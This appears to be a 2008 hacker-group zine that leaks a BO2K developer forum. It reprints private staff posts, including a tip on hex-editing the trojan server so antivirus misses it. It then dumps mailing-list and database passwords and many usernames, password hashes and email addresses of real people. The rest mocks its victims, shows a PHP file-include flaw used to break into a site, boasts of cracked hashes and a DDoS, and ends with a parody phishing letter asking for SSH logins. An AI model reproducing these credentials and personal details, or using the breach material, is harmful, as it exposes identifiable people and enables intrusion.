phpBB New Programmer Digger - Fluffy: Tell me what you think. This was the email. Hi I am interested in providing help for your project. I have worked in C/C++ last 5 yrs. And I remember using BO2K long time back and found it interesting. Let me know if I can be of any help to you.... thanks Srinivas New Programmer Fluffy - DiggerX: Sounds great.... i already would have a little job for him.... but first novice has to tell me where the new bopeep sources are New Programmer Digger - Fluffy: Ok, looks good so far. This person can start with in a week. What do you think we should have him look at/work on first, to see what he can do? Should we have hime make a new plugin or just add to or fix a small bug in one? If so, which bugged plugin? Or, should we really put him to the test and see if he can brind the RootKit up to date with Vista? Let me know what you think. ps. Been reading C and C++ for Dummies. So far only able to add some line of code to those small test programs. Still have a very long way to go in understanding the complete lang. Thanks DiGgErX Making Server undetectable Digger - Fluffy : I don't wan't to post this info cause AV people could be around, you never know. I simply Hex edit my servers. I found encrypter just screw things up. Hexing I can still edit my servers with config tool and server work 100%. Still tring to understand C++ have some tuts but learning this on my own is hard. Talk later... Digger being hardass to no0b: (You must be a active and provide on going participation in our forum)Sorry but, I see you only have 2 or so post. This small app has nothing to do wth our project however I like to give back to our members that have proven to show a true interest in our project by helping other members with questions and such. Our project is Free to use and of course open source so other may change or improve it they will. I some times come across other apps or ideals that I make available to our members. Such software as my netstat killer is availible to the select few. I have updated this app and will soon post a link. I will be more than happy to give you the pw once I see you being active with legit post. Heres pw to the first release you have. Enjoy!alphadeltatango1013xz2007 PASSWORDS PASSWORDS PASSWORDS: Bo2k-dev list - imagelist Bo2k-general - listbutt Bo2k-cvs_updates - listc1v2s3 bo2k-users - dragenter $dbhost = 'mysql4-b.sourceforge.net'; $dbname = 'b4487_phpBB'; $dbuser = 'b4487rw'; $dbpasswd = 'thepiggy'; AndreR 43d5c7dc251e50787cf5c92d1e813277 andrereis@users.sourceforge.net - catkinson 3d5524b7a2c1dcd6f936cfe822b36fa1 catkinson@stillsecure.com - testlab michaeless 4310bc7480e027b4b5aede530e4ee9df michael.w.essary@us.army.mil - 8letters DiGgErX fbd6f8fdb2ad1e8837e763ce54502938 - 246868 Fluffy cb0de5de71eec74a2c4ec6ebc9decfb4 fluffy-stuff@users.sourceforge.net - warumich AndreR 43d5c7dc251e50787cf5c92d1e813277 andrereis@users.sourceforge.net Andy289 e502486ae444b876917c0267371f7f9f Andy155@gmail.com martinmueller d3103f022b66619fcc3002cef386d3bb k2000win@yahoo.com Borealis404 3dae8d135fdd2fea15466039ad7b880c minstrel@outgun.com whipaz f9e960903f96b3606fec2ed914d40798 whipaz@whip.sourceforge.net novice222 a82c6fc93e8638a821eae80416b20a33 novice222@users.sourceforge.net davidleebjr dfd6a6509b923084605a31e2b9028a06 davidleebjr@gmail.com cruxcriticorum e2fd2b03ec512467f30aee772ef5a9d2 cbrien1@ucok.edu rkuk d0199f51d2728db6011945145a1b607a cya@hotmail.co.uk azure_br 34e64393f47d54c3f94a29f70fd2479a azure_br@yahoo.com O.Z.I b04d69c159c0c530ff1185dd9c5e67a5 yo81_2@hotmail.com caustic d750e64f8deb5b64bd85f804a415c5ef caustic@softhome.com Memo c39bcb8926ae17556e616e86fc03b110 mttelli@hotmail.com ethancottier 26a49849343376cd87f42062e7319b18 ejc2k6@hotmail.co.uk u8rwv 83449d980192216a47c7558e6444de12 u8rwv@gawab.com flizzle79 0296cc7e4952b2368f86d479738ce996 flizzle79@yahoo.com test1972 647042ccc182c27ea0687e2a3ea91683 cs_marius@yahoo.com maluk00 ff62abf1b405060874fc88c6f4a2f224 zepunheta3@yahoo.com.br carpman54321 ce3564a0b5be01cd3d38f4d183366981 carpman54321@blueyonder.co.uk aiscs2003 e2a7106f1cc8bb1e1318df70aa0a3540 aiscs2003@yahoo.com Caleb 4cefb24d824696988c7b1d38b35b69e8 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rockinguy 32c46870d28dd5c8cd77e29f9697e826 hottywashere@yahoo.com jawatech 00a1f187721c63501356bf791e69382c frankbeans86@gmail.com mediamaster cf5a300af972c6e9cf96f2eb705e8998 frescolana2001@yahoo.it MEme d948aed52a69a6e26b9f466544f3600f pjwhite69@hotmail.com DiGgErX fbd6f8fdb2ad1e8837e763ce54502938 speakfree@icmail.net Eraser ea9927b12c455c9b89aa23783a81a790 admin@finhosting.fi rewind 345e98f2d5fcb1a656ff710cb11a664f rew@yahoo.com webman f0dc81a8a980333e911f475b62f6f238 webman@gmail.com denisq bc55cdd78e059b9c0935dfdda17a280a quentindenis@compuserve.de nightfire09 608b69bf4a461e21c253e7ef5ddad42b x1001x7@hotmail.com imburne 53ba46c5dac9f4a38a6988056f7498c2 sales@m-s-a.org fatnegro fe320ae47bb5d2a6828d5e45132ea1ed fatnegro@hotmail.com xdarcx 99f446f7227ddd1367609ee4426965bd xdarcx@gmail.com csacsi c071bd38e4c31ed73ec02faa32b52e4a odpqrcin@no.spam.hu PitHH c4f45f022f9419eb421a0b809b218f41 PitHH@web.de 9happy 7ae4e20d98bc0dd60394759866d95067 Splinters_hurt@msn.com andregtz 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halloffame 127c6a283b803a6888c6abab4e3c990b halloffame88@yahoo.com EliteBattleman 416a872750a9cb239d638718da48952b EliteBattleman@gmail.com rolyeguez d591713ae011a0c068e7e41e67090134 rolyeguez@hotmail.com b02k31337 1b6d47df5dd084b34acb0421254c3559 mattsaff@dsl.pipex.com Tassy e15e8305ba59075d89ab25d83823358e tashizex7@gmail.com shooter11 c5fe25896e49ddfe996db7508cf00534 shooter11@everymail.net rohdus 2e78dda59ee83ab00cd22bee344ef3a6 rohdus@yahoo.com deamos 0ac0c4accdc5b0b0469806e9be381be1 cutthiscutthat@hotmail.com newman d482aa034eb68d0630270db1a376a0e2 newman@me.by Craftuser 057b3b95df64e1680da1259ce1fb9b45 craftuser@hotmail.com bekoz 574bf934c801603f9f128139d9c75c85 imbekoz@yahoo.com Snpdo 5ada5946feba299ba4020a0410c93f3c snpdo@live.com repeekyrots 6eeb96b97131a28cac993ca246477ac7 repeekyrots@excite.com ironjrackham ecd729e1e507d6b9593a8330d4ad0795 ironjrackham@yahoo.com kostriak1 bed77bf881c52caf14da5d0b9cd84bc8 kostriak1@pobox.sk gwyn31 cb205edee16b24366c871cf55e781346 robotics123456789@hotmail.com Chrono Clock d0f36b76d650a598455aaa62102f16fa setzer_45@hotmail.com judas 7ec8163d877c1fb0eb83e8db515ab0a0 judasaddiction@yahoo.com nhamvidan 80624718ead20144dab3116e53e54932 nhamvidan@yahoo.com dlee ca6d3bc908fb11928cec1fa4fdbfe50b donald.li@3dsp.com.cn gwyn c524ed2dab8f2edfe1cc34528df0e9c2 robotics12345678@hotmail.com crfog 5badcaf789d3d1d09794d8f021f40f0e f14_tomcat31@hotmail.com deliciousk fcc82593b06931d8c1aa15c1dd7dbab9 martin@deliriumservers.com JackCarlos 3792405c4101502fdd0be7f548818d46 prince_dain@hotmail.com silentmyst 81ccb67b3ecce8bbd4c38165af29eda9 wgswashbuckler@Yahoo.com Titaneous 6538f2edf1e42690f111f871be7e7464 Titaneous@gmail.com lgp802a 727ea5586da5a8fb76cc7b12e01895cc lgp802a@21cn.com GameOver d22157676066a47c49584db544192aa5 solarismka@hotmail.com Florentino 6aecdfe8b004d1e8cb1e42c4414687a9 cn8ok@yahoo.com Marlark 1e20f72184e82e0f5ffce621a1cc6d10 pandascansurf@gmail.com majejo ff8065fc1c559d715ba2dc7ea7359945 ordthekingpin@gmail.com finalta 677b724e54004173026c13a754ff591e g0yanx@yahoo.com WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED .-. _ _ .-. / \ .-. ((___)) .-. / \ /FUCK \ / \ .-. [ x x ] .-. / \ /FUCK \ -/-------\-------/-----\-----/---\--\ /--/---\-----/-----\-------/-------\- /THE cDc\ / \ / `-(' ')-' \ / \ /THE cDc\ \ / `-' (U) `-' \ / `-' `-' WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED God damn that all felt so good. We pwned cultdeadcow.com, ninjastrikeforce.com/ robohara.com, oxblood.net, hacktivismo.com, bo2k.com, comradesmack.com, dildog's life... That's a lot of stuff! Stopping was optional, there's no end! cdc has some interesting people and some who are technically inclined. But that's the thing, interesting *people*, not interesting *hackers*. That is only a problem because they tell the world that they are leading hackers, when they do not even qualify. At best they had a couple of people in the mid-90s, and now a couple of people who joined cdc but whose tech interests are entirely unrelated. Any hacking going on is not going on in cdc; cdc is just a banner organisation that they can all use to add another line to their About pages. They need to fuck off with this hacker stuff. Just drop it. Drop oxblood because he is only around to be the media man. Just settle for being a community of friends, and resist the temptation to tell people that cdc is a hacking group. It's just a big scam, a big lie - gobbles said it in 2002 and we are saying it now. You have defined your organisation around the concept of misleading people who are not in a position to know better. zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 Pwnee Awards zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 The Pwnee Awards are a whenever-we-want underground ceremony celebrating feats in being pwned. We (ZF0) are the pwners, the winners are pwnees. This is our little review of the zine, a winding down as we end. ============================================================================= == Most Blatant Security Hole =============================================== ======================================================= Winner: Rob O'Hara == ============================================================================= "; require_once "$page"; } else { require_once "$page"; }} else { $page = 'index.txt'; require_once "$page"; } ?> The above code is a textbook file include vulnerability. One little catch though, remote files were disabled, so we had to use fun tricks to own the box. Those tricks are Copyright ZF0 2008, we'll license them for the right price! Seriously though, that's a really bad vuln. It's obvious, easy to find (completely outer layer), and easy to exploit. ============================================================================= == Most Thoroughly Refuted Whitehat Security Product ======================== =============================================== Winner: Comodo HackerProof == ============================================================================= Not much to say on this except that HackerProof does not do much for you, and that the naming is complete misrepresentation meant to separate fools and their money. Not much point, unfortunately, since anyone reading this already knew that. ============================================================================= == Most Hashes Cracked ====================================================== ======================================================= Winner: Blackcode == ============================================================================= We actually cracked something over 4,000 of the nearly 10,000 blackcode hashes. We have invented a Noob Index. It works like this: you take the percent of hashes cracked, and double it. That's how juvenile the community is. Gives BC over a 80 score, the highest in this zine. There have been a lot of complaints about us dropping hashes, and about the length of our zine. So we just saved all those for ourselves and gave you the mod passwords, motherfuckers. You can beg us for passes if you need them! ============================================================================= == So Annoying We Couldn't Stop Ourselves From Publishing Their Lame Asses == =================================================== Winner: Triviasecurity == ============================================================================= That basically says it all right there. They are the least notable hack in this zine but someone just got too annoyed at them. ============================================================================= == Most Outrageous RM ======================================================= ============================================================ Winner: g00ns == ============================================================================= Everything from DDoSing their server, to mass confusion about who did the rm, to g00ns members trolling, quitting, lecturing, complaining, and probably crying, it was just a good time watching. ====================== Until next time, stay safe! ========================== zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 On our way out zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 (THIS IS STRICTLY CONFIDENTIAL - OWNER OF SHELL BOX ONLY) COMPLIMENTS OF THE SEASON Good Day! I am a internet hacker from the group ZF0. I am writing you this email to ask for your support and co-operation to carry out this transaction. We have discovered some abandoned warez that includes, g00ns IRC logs dating back months, full g00ns hack logs and misc Wordpress databases, on a random computer somewhere in Italy. We believe the box belonged to a deceased internet hacker. We have made every attempt to contact next-of-kin but none have been forthcoming. We have now decided to look for a trusted partner to apply a claim to this data. The problem is we need a foreign computer to house this data as we cannot afford to maintain the deceased internet connection - it must be foreign as we do not wish the data to fall into the hands of computer forensics agents. We see that as e-walking on someones grave. If you are willing to help us, please confirm via contacting us on the email address below. Please send your Full name, IP address, domains you own and most importantly valid ssh account details to allow us to transport the data via the secure protocol (We do not want government agencies to wiretap and steal the data in transit). You are most kind good sir Sincerly, Giovanni Balechi EMAIL: superheroes@hushmail.com ~~~~~~~~~~~~~~~~~~~~~~~~~~ Hope you enjoyed the show ~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~ ~~~~~~~~~ ~~~~~~ Bye Bye ~~~~~~ ~~~ ~~~